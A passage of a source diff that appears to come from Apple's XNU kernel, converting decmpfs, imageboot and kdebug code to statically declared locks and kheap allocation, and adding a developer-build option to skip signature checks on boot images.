__unused int type, __unused int flags, const char *file, int line) -{ - uint32_t allocSz = sz + 2 * sizeof(allocated); - - allocated *alloc = NULL; - MALLOC(alloc, allocated *, allocSz, type, flags); - if (!alloc) { - ErrorLog("malloc failed\n"); - return NULL; - } - - char *ret = (char*)&alloc[1]; - allocated *alloc2 = (allocated*)(ret + sz); - - alloc->allocSz = allocSz; - alloc->magic = 0xdadadada; - alloc->file = file; - alloc->line = line; - - *alloc2 = *alloc; - - int s = OSAddAtomic(sz, &totalAlloc); - ErrorLog("malloc(%d) -> %p, total allocations %d\n", sz, ret, s + sz); - - return ret; -} - -static void -_free(char *ret, __unused int type, const char *file, int line) -{ - if (!ret) { - ErrorLog("freeing null\n"); - return; - } - allocated *alloc = (allocated*)ret; - alloc--; - uint32_t sz = alloc->allocSz - 2 * sizeof(allocated); - allocated *alloc2 = (allocated*)(ret + sz); - - if (alloc->magic != 0xdadadada) { - panic("freeing bad pointer"); - } - - if (memcmp(alloc, alloc2, sizeof(*alloc)) != 0) { - panic("clobbered data"); - } - - memset(ret, 0xce, sz); - alloc2->file = file; - alloc2->line = line; - FREE(alloc, type); - int s = OSAddAtomic(-sz, &totalAlloc); - ErrorLog("free(%p,%d) -> total allocations %d\n", ret, sz, s - sz); -} - -#undef MALLOC -#undef FREE -#define MALLOC(space, cast, size, type, flags) (space) = (cast)_malloc(size, type, flags, __FILE__, __LINE__) -#define FREE(addr, type) _free((void *)addr, type, __FILE__, __LINE__) - -#endif /* MALLOC_DEBUG */ - #pragma mark --- globals --- -static lck_grp_t *decmpfs_lockgrp; +static LCK_GRP_DECLARE(decmpfs_lockgrp, "VFSCOMP"); +static LCK_RW_DECLARE(decompressorsLock, &decmpfs_lockgrp); +static LCK_MTX_DECLARE(decompress_channel_mtx, &decmpfs_lockgrp); static const decmpfs_registration *decompressors[CMP_MAX]; /* the registered compressors */ -static lck_rw_t * decompressorsLock; static int decompress_channel; /* channel used by decompress_file to wake up waiters */ -static lck_mtx_t *decompress_channel_mtx; vfs_context_t decmpfs_ctx; @@ -280,20 +200,20 @@ _decmp_get_func(vnode_t vp, uint32_t type, uintptr_t offset, uint32_t discrimina snprintf(resourceName, sizeof(resourceName), "com.apple.AppleFSCompression.Type%u", type); ErrorLogWithPath("waiting for %s\n", resourceName); while (decompressors[type] == NULL) { - lck_rw_unlock_shared(decompressorsLock); // we have to unlock to allow the kext to register + lck_rw_unlock_shared(&decompressorsLock); // we have to unlock to allow the kext to register if (IOServiceWaitForMatchingResource(resourceName, delay)) { - lck_rw_lock_shared(decompressorsLock); + lck_rw_lock_shared(&decompressorsLock); break; } if (!IOCatalogueMatchingDriversPresent(providesName)) { // ErrorLogWithPath("the kext with %s is no longer present\n", providesName); - lck_rw_lock_shared(decompressorsLock); + lck_rw_lock_shared(&decompressorsLock); break; } ErrorLogWithPath("still waiting for %s\n", resourceName); delay *= 2; - lck_rw_lock_shared(decompressorsLock); + lck_rw_lock_shared(&decompressorsLock); } // IOKit says the kext is loaded, so it should be registered too! if (decompressors[type] == NULL) { @@ -351,13 +271,13 @@ void decmpfs_cnode_init(decmpfs_cnode *cp) { memset(cp, 0, sizeof(*cp)); - lck_rw_init(&cp->compressed_data_lock, decmpfs_lockgrp, NULL); + lck_rw_init(&cp->compressed_data_lock, &decmpfs_lockgrp, NULL); } void decmpfs_cnode_destroy(decmpfs_cnode *cp) { - lck_rw_destroy(&cp->compressed_data_lock, decmpfs_lockgrp); + lck_rw_destroy(&cp->compressed_data_lock, &decmpfs_lockgrp); } bool @@ -549,7 +469,7 @@ decmpfs_cnode_cmp_type(decmpfs_cnode *cp) #pragma mark --- decmpfs state routines --- static int -decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header **hdrOut, int returnInvalid) +decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header **hdrOut, int returnInvalid, size_t *hdr_size) { /* * fetches vp's compression xattr, converting it into a decmpfs_header; returns 0 or errno @@ -559,6 +479,7 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header ** size_t read_size = 0; size_t attr_size = 0; + size_t alloc_size = 0; uio_t attr_uio = NULL; int err = 0; char *data = NULL; @@ -581,7 +502,8 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header ** if (no_additional_data) { /* this file's xattr didn't have any extra data when we fetched it, so we can synthesize a header from the data in the cnode */ - MALLOC(data, char *, sizeof(decmpfs_header), M_TEMP, M_WAITOK); + alloc_size = sizeof(decmpfs_header); + data = kheap_alloc(KHEAP_TEMP, alloc_size, Z_WAITOK); if (!data) { err = ENOMEM; goto out; @@ -609,6 +531,7 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header ** if (err != 0) { goto out; } + alloc_size = attr_size + sizeof(hdr->attr_size); if (attr_size < sizeof(decmpfs_disk_header) || attr_size > MAX_DECMPFS_XATTR_SIZE) { err = EINVAL; @@ -616,7 +539,7 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header ** } /* allocation includes space for the extra attr_size field of a compressed_header */ - MALLOC(data, char *, attr_size + sizeof(hdr->attr_size), M_TEMP, M_WAITOK); + data = kheap_alloc(KHEAP_TEMP, alloc_size, Z_WAITOK); if (!data) { err = ENOMEM; goto out; @@ -669,12 +592,11 @@ decmpfs_fetch_compressed_header(vnode_t vp, decmpfs_cnode *cp, decmpfs_header ** out: if (err && (err != ERANGE)) { DebugLogWithPath("err %d\n", err); - if (data) { - FREE(data, M_TEMP); - } + kheap_free(KHEAP_TEMP, data, alloc_size); *hdrOut = NULL; } else { *hdrOut = hdr; + *hdr_size = alloc_size; } /* * Trace the following parameters on return with event-id 0x03120004. @@ -744,9 +666,10 @@ errno_t decmpfs_validate_compressed_file(vnode_t vp, decmpfs_cnode *cp) { /* give a compressor a chance to indicate that a compressed file is invalid */ - decmpfs_header *hdr = NULL; - errno_t err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0); + size_t alloc_size = 0; + errno_t err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &alloc_size); + if (err) { /* we couldn't get the header */ if (decmpfs_fast_get_state(cp) == FILE_IS_NOT_COMPRESSED) { @@ -757,7 +680,7 @@ decmpfs_validate_compressed_file(vnode_t vp, decmpfs_cnode *cp) } if (!decmpfs_type_is_dataless(hdr->compression_type)) { - lck_rw_lock_shared(decompressorsLock); + lck_rw_lock_shared(&decompressorsLock); decmpfs_validate_compressed_file_func validate = decmp_get_func(vp, hdr->compression_type, validate); if (validate) { /* make sure this validation function is valid */ /* is the data okay? */ @@ -769,11 +692,11 @@ decmpfs_validate_compressed_file(vnode_t vp, decmpfs_cnode *cp) /* no validate registered, so nothing to do */ err = 0; } - lck_rw_unlock_shared(decompressorsLock); + lck_rw_unlock_shared(&decompressorsLock); } out: - if (hdr) { - FREE(hdr, M_TEMP); + if (hdr != NULL) { + kheap_free(KHEAP_TEMP, hdr, alloc_size); } #if COMPRESSION_DEBUG if (err) { @@ -799,6 +722,7 @@ decmpfs_file_is_compressed(vnode_t vp, decmpfs_cnode *cp) uint32_t cmp_state; struct vnode_attr va_fetch; decmpfs_header *hdr = NULL; + size_t alloc_size = 0; mount_t mp = NULL; int cnode_locked = 0; int saveInvalid = 0; // save the header data even though the type was out of range @@ -882,7 +806,7 @@ decmpfs_file_is_compressed(vnode_t vp, decmpfs_cnode *cp) } if (va_fetch.va_flags & UF_COMPRESSED) { /* UF_COMPRESSED is on, make sure the file has the DECMPFS_XATTR_NAME xattr */ - error = decmpfs_fetch_compressed_header(vp, cp, &hdr, 1); + error = decmpfs_fetch_compressed_header(vp, cp, &hdr, 1, &alloc_size); if ((hdr != NULL) && (error == ERANGE)) { saveInvalid = 1; } @@ -942,12 +866,12 @@ done: ubc_setsize(vp, hdr->uncompressed_size); /* update the decompression flags in the decmpfs cnode */ - lck_rw_lock_shared(decompressorsLock); + lck_rw_lock_shared(&decompressorsLock); decmpfs_get_decompression_flags_func get_flags = decmp_get_func(vp, hdr->compression_type, get_flags); if (get_flags) { decompression_flags = get_flags(vp, decmpfs_ctx, hdr); } - lck_rw_unlock_shared(decompressorsLock); + lck_rw_unlock_shared(&decompressorsLock); decmpfs_cnode_set_decompression_flags(cp, decompression_flags); } } else { @@ -959,9 +883,10 @@ done: decmpfs_unlock_compressed_data(cp, 1); } - if (hdr) { - FREE(hdr, M_TEMP); + if (hdr != NULL) { + kheap_free(KHEAP_TEMP, hdr, alloc_size); } + /* * Trace the following parameters on return with event-id 0x03120014. * @@ -1021,7 +946,8 @@ decmpfs_update_attributes(vnode_t vp, struct vnode_attr *vap) } decmpfs_header *hdr = NULL; - error = decmpfs_fetch_compressed_header(vp, NULL, &hdr, 1); + size_t alloc_size = 0; + error = decmpfs_fetch_compressed_header(vp, NULL, &hdr, 1, &alloc_size); if (error == 0) { /* * Allow the flag to be set since the decmpfs attribute @@ -1043,8 +969,8 @@ decmpfs_update_attributes(vnode_t vp, struct vnode_attr *vap) /* no DECMPFS_XATTR_NAME attribute, so deny the update */ vap->va_flags &= ~UF_COMPRESSED; } - if (hdr) { - FREE(hdr, M_TEMP); + if (hdr != NULL) { + kheap_free(KHEAP_TEMP, hdr, alloc_size); } } } @@ -1057,15 +983,15 @@ static int wait_for_decompress(decmpfs_cnode *cp) { int state; - lck_mtx_lock(decompress_channel_mtx); + lck_mtx_lock(&decompress_channel_mtx); do { state = decmpfs_fast_get_state(cp); if (state != FILE_IS_CONVERTING) { /* file is not decompressing */ - lck_mtx_unlock(decompress_channel_mtx); + lck_mtx_unlock(&decompress_channel_mtx); return state; } - msleep((caddr_t)&decompress_channel, decompress_channel_mtx, PINOD, "wait_for_decompress", NULL); + msleep((caddr_t)&decompress_channel, &decompress_channel_mtx, PINOD, "wait_for_decompress", NULL); } while (1); } @@ -1145,7 +1071,7 @@ register_decmpfs_decompressor(uint32_t compression_type, const decmpfs_registrat goto out; } - lck_rw_lock_exclusive(decompressorsLock); locked = 1; + lck_rw_lock_exclusive(&decompressorsLock); locked = 1; /* make sure the registration for this type is zero */ if (decompressors[compression_type] != NULL) { @@ -1158,7 +1084,7 @@ register_decmpfs_decompressor(uint32_t compression_type, const decmpfs_registrat out: if (locked) { - lck_rw_unlock_exclusive(decompressorsLock); + lck_rw_unlock_exclusive(&decompressorsLock); } return ret; } @@ -1177,7 +1103,7 @@ unregister_decmpfs_decompressor(uint32_t compression_type, decmpfs_registration goto out; } - lck_rw_lock_exclusive(decompressorsLock); locked = 1; + lck_rw_lock_exclusive(&decompressorsLock); locked = 1; if (decompressors[compression_type] != registration) { ret = EEXIST; goto out; @@ -1188,7 +1114,7 @@ unregister_decmpfs_decompressor(uint32_t compression_type, decmpfs_registration out: if (locked) { - lck_rw_unlock_exclusive(decompressorsLock); + lck_rw_unlock_exclusive(&decompressorsLock); } return ret; } @@ -1200,11 +1126,11 @@ compression_type_valid(vnode_t vp, decmpfs_header *hdr) int ret = 0; /* every compressor must have at least a fetch function */ - lck_rw_lock_shared(decompressorsLock); + lck_rw_lock_shared(&decompressorsLock); if (decmp_get_func(vp, hdr->compression_type, fetch) != NULL) { ret = 1; } - lck_rw_unlock_shared(decompressorsLock); + lck_rw_unlock_shared(&decompressorsLock); return ret; } @@ -1253,11 +1179,11 @@ decmpfs_fetch_uncompressed_data(vnode_t vp, decmpfs_cnode *cp, decmpfs_header *h */ DECMPFS_EMIT_TRACE_ENTRY(DECMPDBG_FETCH_UNCOMPRESSED_DATA, vp->v_id, hdr->compression_type, (int)offset, (int)size); - lck_rw_lock_shared(decompressorsLock); + lck_rw_lock_shared(&decompressorsLock); decmpfs_fetch_uncompressed_data_func fetch = decmp_get_func(vp, hdr->compression_type, fetch); if (fetch) { err = fetch(vp, decmpfs_ctx, hdr, offset, size, nvec, vec, bytes_read); - lck_rw_unlock_shared(decompressorsLock); + lck_rw_unlock_shared(&decompressorsLock); if (err == 0) { uint64_t decompression_flags = decmpfs_cnode_get_decompression_flags(cp); if (decompression_flags & DECMPFS_FLAGS_FORCE_FLUSH_ON_DECOMPRESS) { @@ -1272,7 +1198,7 @@ decmpfs_fetch_uncompressed_data(vnode_t vp, decmpfs_cnode *cp, decmpfs_header *h } } else { err = ENOTSUP; - lck_rw_unlock_shared(decompressorsLock); + lck_rw_unlock_shared(&decompressorsLock); } /* * Trace the following parameters on return with event-id 0x03120008. @@ -1333,6 +1259,7 @@ decmpfs_pagein_compressed(struct vnop_pagein_args *ap, int *is_compressed, decmp size_t verify_block_size = 0; void *data = NULL; decmpfs_header *hdr = NULL; + size_t alloc_size = 0; uint64_t cachedSize = 0; int cmpdata_locked = 0; bool file_tail_page_valid = false; @@ -1349,7 +1276,7 @@ decmpfs_pagein_compressed(struct vnop_pagein_args *ap, int *is_compressed, decmp DebugLogWithPath("pagein: unknown flags 0x%08x\n", (flags & ~(UPL_IOSYNC | UPL_NOCOMMIT | UPL_NORDAHEAD))); } - err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0); + err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &alloc_size); if (err != 0) { goto out; } @@ -1613,8 +1540,8 @@ out: if (data) { ubc_upl_unmap(pl); } - if (hdr) { - FREE(hdr, M_TEMP); + if (hdr != NULL) { + kheap_free(KHEAP_TEMP, hdr, alloc_size); } if (cmpdata_locked) { decmpfs_unlock_compressed_data(cp, 0); @@ -1622,10 +1549,9 @@ out: if (err) { #if 0 if (err != ENXIO && err != ENOSPC) { - char *path; - MALLOC(path, char *, PATH_MAX, M_TEMP, M_WAITOK); + char *path = zalloc(ZV_NAMEI); panic("%s: decmpfs_pagein_compressed: err %d", vnpath(vp, path, PATH_MAX), err); - FREE(path, M_TEMP); + zfree(ZV_NAMEI, path); } #endif /* 0 */ ErrorLogWithPath("err %d\n", err); @@ -1654,6 +1580,7 @@ decmpfs_read_compressed(struct vnop_read_args *ap, int *is_compressed, decmpfs_c upl_t upl = NULL; upl_page_info_t *pli = NULL; decmpfs_header *hdr = NULL; + size_t alloc_size = 0; uint64_t cachedSize = 0; off_t uioPos = 0; user_ssize_t uioRemaining = 0; @@ -1694,7 +1621,7 @@ decmpfs_read_compressed(struct vnop_read_args *ap, int *is_compressed, decmpfs_c goto out; } - err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0); + err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &alloc_size); if (err != 0) { goto out; } @@ -1709,14 +1636,14 @@ decmpfs_read_compressed(struct vnop_read_args *ap, int *is_compressed, decmpfs_c DebugLogWithPath("uplPos %lld uplSize %lld\n", (uint64_t)uplPos, (uint64_t)uplSize); #endif - lck_rw_lock_shared(decompressorsLock); + lck_rw_lock_shared(&decompressorsLock); decmpfs_adjust_fetch_region_func adjust_fetch = decmp_get_func(vp, hdr->compression_type, adjust_fetch); if (adjust_fetch) { /* give the compressor a chance to adjust the portion of the file that we read */ adjust_fetch(vp, decmpfs_ctx, hdr, &uplPos, &uplSize); VerboseLogWithPath("adjusted uplPos %lld uplSize %lld\n", (uint64_t)uplPos, (uint64_t)uplSize); } - lck_rw_unlock_shared(decompressorsLock); + lck_rw_unlock_shared(&decompressorsLock); /* clip the adjusted size to the size of the file */ if ((uint64_t)uplPos + uplSize > cachedSize) { @@ -1791,10 +1718,9 @@ decmpfs_read_compressed(struct vnop_read_args *ap, int *is_compressed, decmpfs_c if (kr != KERN_SUCCESS) { commit_upl(upl, 0, curUplSize, UPL_ABORT_FREE_ON_EMPTY, 1); #if 0 - char *path; - MALLOC(path, char *, PATH_MAX, M_TEMP, M_WAITOK); + char *path = zalloc(ZV_NAMEI); panic("%s: decmpfs_read_compressed: ubc_upl_map error %d", vnpath(vp, path, PATH_MAX), (int)kr); - FREE(path, M_TEMP); + zfree(ZV_NAMEI, path); #else /* 0 */ ErrorLogWithPath("ubc_upl_map kr=0x%x\n", (int)kr); #endif /* 0 */ @@ -1901,8 +1827,8 @@ decompress: out: - if (hdr) { - FREE(hdr, M_TEMP); + if (hdr != NULL) { + kheap_free(KHEAP_TEMP, hdr, alloc_size); } if (cmpdata_locked) { decmpfs_unlock_compressed_data(cp, 0); @@ -1929,6 +1855,7 @@ decmpfs_free_compressed_data(vnode_t vp, decmpfs_cnode *cp) * then delete the file's compression xattr */ decmpfs_header *hdr = NULL; + size_t alloc_size = 0; /* * Trace the following parameters on entry with event-id 0x03120010. @@ -1937,11 +1864,11 @@ decmpfs_free_compressed_data(vnode_t vp, decmpfs_cnode *cp) */ DECMPFS_EMIT_TRACE_ENTRY(DECMPDBG_FREE_COMPRESSED_DATA, vp->v_id); - int err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0); + int err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &alloc_size); if (err) { ErrorLogWithPath("decmpfs_fetch_compressed_header err %d\n", err); } else { - lck_rw_lock_shared(decompressorsLock); + lck_rw_lock_shared(&decompressorsLock); decmpfs_free_compressed_data_func free_data = decmp_get_func(vp, hdr->compression_type, free_data); if (free_data) { err = free_data(vp, decmpfs_ctx, hdr); @@ -1949,7 +1876,7 @@ decmpfs_free_compressed_data(vnode_t vp, decmpfs_cnode *cp) /* nothing to do, so no error */ err = 0; } - lck_rw_unlock_shared(decompressorsLock); + lck_rw_unlock_shared(&decompressorsLock); if (err != 0) { ErrorLogWithPath("decompressor err %d\n", err); @@ -1965,13 +1892,9 @@ decmpfs_free_compressed_data(vnode_t vp, decmpfs_cnode *cp) /* delete the xattr */ err = vn_removexattr(vp, DECMPFS_XATTR_NAME, 0, decmpfs_ctx); - if (err != 0) { - goto out; - } -out: - if (hdr) { - FREE(hdr, M_TEMP); + if (hdr != NULL) { + kheap_free(KHEAP_TEMP, hdr, alloc_size); } return err; } @@ -2018,6 +1941,7 @@ decmpfs_decompress_file(vnode_t vp, decmpfs_cnode *cp, off_t toSize, int truncat int update_file_state = 0; size_t allocSize = 0; decmpfs_header *hdr = NULL; + size_t hdr_size = 0; int cmpdata_locked = 0; off_t remaining = 0; uint64_t uncompressed_size = 0; @@ -2077,7 +2001,7 @@ decompress: } } - err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0); + err = decmpfs_fetch_compressed_header(vp, cp, &hdr, 0, &hdr_size); if (err != 0) { goto out; } @@ -2096,7 +2020,7 @@ decompress: } allocSize = MIN(64 * 1024, (size_t)toSize); - MALLOC(data, char *, allocSize, M_TEMP, M_WAITOK); + data = kheap_alloc(KHEAP_TEMP, allocSize, Z_WAITOK); if (!data) { err = ENOMEM; goto out; @@ -2210,12 +2134,10 @@ nodecmp: #endif out: - if (hdr) { - FREE(hdr, M_TEMP); - } - if (data) { - FREE(data, M_TEMP); + if (hdr != NULL) { + kheap_free(KHEAP_TEMP, hdr, hdr_size); } + kheap_free(KHEAP_TEMP, data, allocSize); if (uio_w) { uio_free(uio_w); } @@ -2231,10 +2153,10 @@ out: } if (update_file_state) { - lck_mtx_lock(decompress_channel_mtx); + lck_mtx_lock(&decompress_channel_mtx); decmpfs_cnode_set_vnode_state(cp, new_state, 1); wakeup((caddr_t)&decompress_channel); /* wake up anyone who might have been waiting for decompression */ - lck_mtx_unlock(decompress_channel_mtx); + lck_mtx_unlock(&decompress_channel_mtx); } if (cmpdata_locked) { @@ -2318,7 +2240,7 @@ SECURITY_READ_ONLY_EARLY(static decmpfs_registration) Type1Reg = #pragma mark --- decmpfs initialization --- void -decmpfs_init() +decmpfs_init(void) { static int done = 0; if (done) { @@ -2327,12 +2249,6 @@ decmpfs_init() decmpfs_ctx = vfs_context_create(vfs_context_kernel()); - lck_grp_attr_t *attr = lck_grp_attr_alloc_init(); - decmpfs_lockgrp = lck_grp_alloc_init("VFSCOMP", attr); - lck_grp_attr_free(attr); - decompressorsLock = lck_rw_alloc_init(decmpfs_lockgrp, NULL); - decompress_channel_mtx = lck_mtx_alloc_init(decmpfs_lockgrp, NULL); - register_decmpfs_decompressor(CMP_Type1, &Type1Reg); done = 1; diff --git a/bsd/kern/imageboot.c b/bsd/kern/imageboot.c index 36a275c68..1672c8f1f 100644 --- a/bsd/kern/imageboot.c +++ b/bsd/kern/imageboot.c @@ -91,7 +91,7 @@ static boolean_t imageboot_setup_new(imageboot_type_t type); void *ubc_getobject_from_filename(const char *filename, struct vnode **vpp, off_t *file_size); -extern lck_rw_t * rootvnode_rw_lock; +extern lck_rw_t rootvnode_rw_lock; #define kIBFilePrefix "file://" @@ -199,12 +199,12 @@ extern bool IOBaseSystemARVRootHashAvailable(void); * It will be mounted at mount_path. * The vfs_switch_root operation will be performed. * After the pivot, the outgoing root filesystem (the filesystem at root when - * this function begins) will be at outgoing_root_path. If `rooted_dmg` is true, - * then ignore then chunklisted or authAPFS checks on this image + * this function begins) will be at outgoing_root_path. If `skip_signature_check` is true, + * then ignore the chunklisted or authAPFS checks on this image */ __private_extern__ int imageboot_pivot_image(const char *image_path, imageboot_type_t type, const char *mount_path, - const char *outgoing_root_path, const bool rooted_dmg) + const char *outgoing_root_path, const bool rooted_dmg, const bool skip_signature_check) { int error; boolean_t authenticated_dmg_chunklist = false; @@ -324,8 +324,9 @@ imageboot_pivot_image(const char *image_path, imageboot_type_t type, const char /* * If we are using a custom rooted DMG, or if we have already authenticated * the DMG via chunklist, then it is permissible to use. + * Or, if CSR_ALLOW_ANY_RECOVERY_OS is set on Development or Debug build variant. */ - if (rooted_dmg || authenticated_dmg_chunklist) { + if (rooted_dmg || authenticated_dmg_chunklist || skip_signature_check) { rootauth = 0; } error = rootauth; @@ -505,7 +506,7 @@ imageboot_mount_image(const char *root_path, int height, imageboot_type_t type) vnode_ref(newdp); vnode_put(newdp); - lck_rw_lock_exclusive(rootvnode_rw_lock); + lck_rw_lock_exclusive(&rootvnode_rw_lock); /* switch to the new rootvnode */ if (update_rootvnode) { rootvnode = newdp; @@ -518,7 +519,7 @@ imageboot_mount_image(const char *root_path, int height, imageboot_type_t type) mount_unlock(new_rootfs); filedesc0.fd_cdir = newdp; - lck_rw_unlock_exclusive(rootvnode_rw_lock); + lck_rw_unlock_exclusive(&rootvnode_rw_lock); DBG_TRACE("%s: root switched\n", __FUNCTION__); @@ -696,6 +697,9 @@ imgboot_get_image_file(const char *path, off_t *fsize, int *errp) } if (err) { + if (vp) { + vnode_put(vp); + } *errp = err; vp = NULL; } @@ -843,15 +847,15 @@ imageboot_mount_ramdisk(const char *path) #endif /* ... and unmount everything */ - vfs_unmountall(); + vfs_unmountall(FALSE); - lck_rw_lock_exclusive(rootvnode_rw_lock); + lck_rw_lock_exclusive(&rootvnode_rw_lock); filedesc0.fd_cdir = NULL; tvp = rootvnode; rootvnode = NULL; rootvp = NULLVP; rootdev = NODEV; - lck_rw_unlock_exclusive(rootvnode_rw_lock); + lck_rw_unlock_exclusive(&rootvnode_rw_lock); vnode_get_and_drop_always(tvp); /* Attach the ramfs image ... */ @@ -876,7 +880,7 @@ imageboot_mount_ramdisk(const char *path) } vnode_ref(newdp); - lck_rw_lock_exclusive(rootvnode_rw_lock); + lck_rw_lock_exclusive(&rootvnode_rw_lock); rootvnode = newdp; rootvnode->v_flag |= VROOT; new_rootfs = rootvnode->v_mount; @@ -887,7 +891,7 @@ imageboot_mount_ramdisk(const char *path) set_fake_bootuuid(new_rootfs); filedesc0.fd_cdir = newdp; - lck_rw_unlock_exclusive(rootvnode_rw_lock); + lck_rw_unlock_exclusive(&rootvnode_rw_lock); vnode_put(newdp); diff --git a/bsd/kern/kdebug.c b/bsd/kern/kdebug.c index f0ca4b75c..2d3de0289 100644 --- a/bsd/kern/kdebug.c +++ b/bsd/kern/kdebug.c @@ -440,8 +440,9 @@ unsigned int kdlog_value2 = 0; unsigned int kdlog_value3 = 0; unsigned int kdlog_value4 = 0; -static lck_spin_t * kdw_spin_lock; -static lck_spin_t * kds_spin_lock; +static LCK_GRP_DECLARE(kdebug_lck_grp, "kdebug"); +static LCK_SPIN_DECLARE(kdw_spin_lock, &kdebug_lck_grp); +static LCK_SPIN_DECLARE(kds_spin_lock, &kdebug_lck_grp); kd_threadmap *kd_mapptr = 0; vm_size_t kd_mapsize = 0; @@ -665,8 +666,6 @@ kdbg_iop_list_callback(kd_iop_t* iop, kd_callback_type type, void* arg) } } -static lck_grp_t *kdebug_lck_grp = NULL; - static void kdbg_set_tracing_enabled(bool enabled, uint32_t trace_type) { @@ -679,7 +678,7 @@ kdbg_set_tracing_enabled(bool enabled, uint32_t trace_type) NULL); int s = ml_set_interrupts_enabled(false); - lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp); + lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp); if (enabled) { /* @@ -696,7 +695,7 @@ kdbg_set_tracing_enabled(bool enabled, uint32_t trace_type) kd_ctrl_page.enabled = 0; commpage_update_kdebug_state(); } - lck_spin_unlock(kds_spin_lock); + lck_spin_unlock(&kds_spin_lock); ml_set_interrupts_enabled(s); if (enabled) { @@ -712,7 +711,7 @@ static void kdbg_set_flags(int slowflag, int enableflag, bool enabled) { int s = ml_set_interrupts_enabled(false); - lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp); + lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp); if (enabled) { kd_ctrl_page.kdebug_slowcheck |= slowflag; @@ -722,7 +721,7 @@ kdbg_set_flags(int slowflag, int enableflag, bool enabled) kdebug_enable &= ~enableflag; } - lck_spin_unlock(kds_spin_lock); + lck_spin_unlock(&kds_spin_lock); ml_set_interrupts_enabled(s); } @@ -734,7 +733,7 @@ disable_wrap(uint32_t *old_slowcheck, uint32_t *old_flags) { bool wrapped; int s = ml_set_interrupts_enabled(false); - lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp); + lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp); *old_slowcheck = kd_ctrl_page.kdebug_slowcheck; *old_flags = kd_ctrl_page.kdebug_flags; @@ -743,7 +742,7 @@ disable_wrap(uint32_t *old_slowcheck, uint32_t *old_flags) kd_ctrl_page.kdebug_flags &= ~KDBG_WRAPPED; kd_ctrl_page.kdebug_flags |= KDBG_NOWRAP; - lck_spin_unlock(kds_spin_lock); + lck_spin_unlock(&kds_spin_lock); ml_set_interrupts_enabled(s); return wrapped; @@ -753,7 +752,7 @@ static void enable_wrap(uint32_t old_slowcheck) { int s = ml_set_interrupts_enabled(false); - lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp); + lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp); kd_ctrl_page.kdebug_flags &= ~KDBG_NOWRAP; @@ -761,7 +760,7 @@ enable_wrap(uint32_t old_slowcheck) kd_ctrl_page.kdebug_slowcheck &= ~SLOW_NOLOG; } - lck_spin_unlock(kds_spin_lock); + lck_spin_unlock(&kds_spin_lock); ml_set_interrupts_enabled(s); } @@ -935,7 +934,7 @@ release_storage_unit(int cpu, uint32_t kdsp_raw) kdsp.raw = kdsp_raw; s = ml_set_interrupts_enabled(false); - lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp); + lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp); kdbp = &kdbip[cpu]; @@ -958,7 +957,7 @@ release_storage_unit(int cpu, uint32_t kdsp_raw) kd_ctrl_page.kds_inuse_count--; } - lck_spin_unlock(kds_spin_lock); + lck_spin_unlock(&kds_spin_lock); ml_set_interrupts_enabled(s); } @@ -973,7 +972,7 @@ allocate_storage_unit(int cpu) int s = 0; s = ml_set_interrupts_enabled(false); - lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp); + lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp); kdbp = &kdbip[cpu]; @@ -1081,7 +1080,7 @@ allocate_storage_unit(int cpu) } kdbp->kd_list_tail = kdsp; out: - lck_spin_unlock(kds_spin_lock); + lck_spin_unlock(&kds_spin_lock); ml_set_interrupts_enabled(s); return retval; @@ -2066,27 +2065,6 @@ kdebug_trace_string(__unused struct proc *p, return 0; } -static void -kdbg_lock_init(void) -{ - static lck_grp_attr_t *kdebug_lck_grp_attr = NULL; - static lck_attr_t *kdebug_lck_attr = NULL; - - if (kd_ctrl_page.kdebug_flags & KDBG_LOCKINIT) { - return; - } - - assert(kdebug_lck_grp_attr == NULL); - kdebug_lck_grp_attr = lck_grp_attr_alloc_init(); - kdebug_lck_grp = lck_grp_alloc_init("kdebug", kdebug_lck_grp_attr); - kdebug_lck_attr = lck_attr_alloc_init(); - - kds_spin_lock = lck_spin_alloc_init(kdebug_lck_grp, kdebug_lck_attr); - kdw_spin_lock = lck_spin_alloc_init(kdebug_lck_grp, kdebug_lck_attr); - - kd_ctrl_page.kdebug_flags |= KDBG_LOCKINIT; -} - int kdbg_bootstrap(bool early_trace) { @@ -2425,8 +2403,6 @@ kdebug_reset(void) { ktrace_assert_lock_held(); - kdbg_lock_init(); - kdbg_clear(); if (kdbg_typefilter) { typefilter_reject_all(kdbg_typefilter); @@ -3354,7 +3330,7 @@ kdbg_wait(uint64_t timeout_ms, bool locked_wait) if (!s) { panic("kdbg_wait() called with interrupts disabled"); } - lck_spin_lock_grp(kdw_spin_lock, kdebug_lck_grp); + lck_spin_lock_grp(&kdw_spin_lock, &kdebug_lck_grp); if (!locked_wait) { /* drop the mutex to allow others to access trace */ @@ -3366,9 +3342,9 @@ kdbg_wait(uint64_t timeout_ms, bool locked_wait) kds_waiter = 1; if (abstime) { - wait_result = lck_spin_sleep_deadline(kdw_spin_lock, 0, &kds_waiter, THREAD_ABORTSAFE, abstime); + wait_result = lck_spin_sleep_deadline(&kdw_spin_lock, 0, &kds_waiter, THREAD_ABORTSAFE, abstime); } else { - wait_result = lck_spin_sleep(kdw_spin_lock, 